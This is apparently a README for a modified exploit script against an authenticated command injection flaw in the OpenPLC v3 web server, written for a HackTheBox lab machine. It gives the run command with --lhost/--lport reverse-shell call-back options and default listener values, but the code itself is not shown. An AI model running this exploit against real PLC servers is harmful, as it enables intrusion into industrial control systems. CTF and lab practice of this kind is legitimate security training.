OpenPLC 3 Веб-сервер аутентифицированное удаленное выполнение кода.
OpenPLC 3 WebServer Authenticated Remote Code Execution.
Наличие внедрения команд (Command Injection) в веб-сервере Open PLC v3 позволяет удалённым злоумышленникам выполнять произвольный код. Протестировано только на машине HTB Wifinetictwo.htb.
Я обнаружил проблемы со всеми скриптами, которые эксплуатировали эту уязвимость, возможно, из-за того, что я использую parrot или мой браузер. Chromium работает для входа, у меня были проблемы с входом в Firefox, и с POST-запросом на вход в веб-сервер происходит что-то странное. Я модифицировал скрипт от thewhiteh4t; есть части (в основном метод загрузки), которые просто скопированы, но я изменил часть, получающую куки с сервера для запуска эксплойта.
Оригинальный PoC предоставлен Fellipe Oliveira
Надеюсь, это поможет вам, если у вас возникнут с ним проблемы.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
Альтернативно, вы можете изменить exploit.py
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass